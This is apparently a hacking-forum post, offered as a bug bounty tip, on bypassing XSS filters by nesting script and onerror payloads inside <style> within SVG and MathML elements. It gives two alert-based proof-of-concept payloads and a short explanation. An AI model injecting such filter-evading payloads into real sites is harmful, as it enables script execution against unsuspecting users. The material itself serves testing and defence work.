dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 27
- Reaction score
- 45,546
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
Bug Bounty Tip – SVG & Math XSS Payload Bypass This post was created for the Hack Tools Dark Community. Share your thoughts below and let’s discuss techniques!
You might be interested in reading this article:
SVG Event Handler Quirk: The 'evt' Parameter and DOM Leakage Risks 
Context:Web Application Firewalls (WAFs) and client-side sanitizers often look for
<script> tags or suspicious onerror/onclick handlers in standard HTML. But what happens when you embed them in less-expected tags like <svg> or <math>?
Technique by: therceman
Idea: You can bypass XSS filters by nesting payloads inside SVG or MathML elements.
Example 1 – SVG Injection:
HTML:
<svg>
<style>
<script>alert(1)</script>
</style>
</svg>
HTML:
<math>
<style>
<img src onerror=alert(2)>
</style>
</math>
Why it works:These non-traditional elements are often overlooked by naive filters and some sanitizers. While
<script>inside <style> might look strange, browsers like Chrome still parse and execute it depending on the context and CSP settings. Disclaimer:This information is shared for educational and ethical testing purposes only. Never attempt XSS exploitation on unauthorized systems.
Have you seen this technique bypass a specific WAF? What other obscure HTML elements have you used?
Share your payloads, findings, or countermeasures below!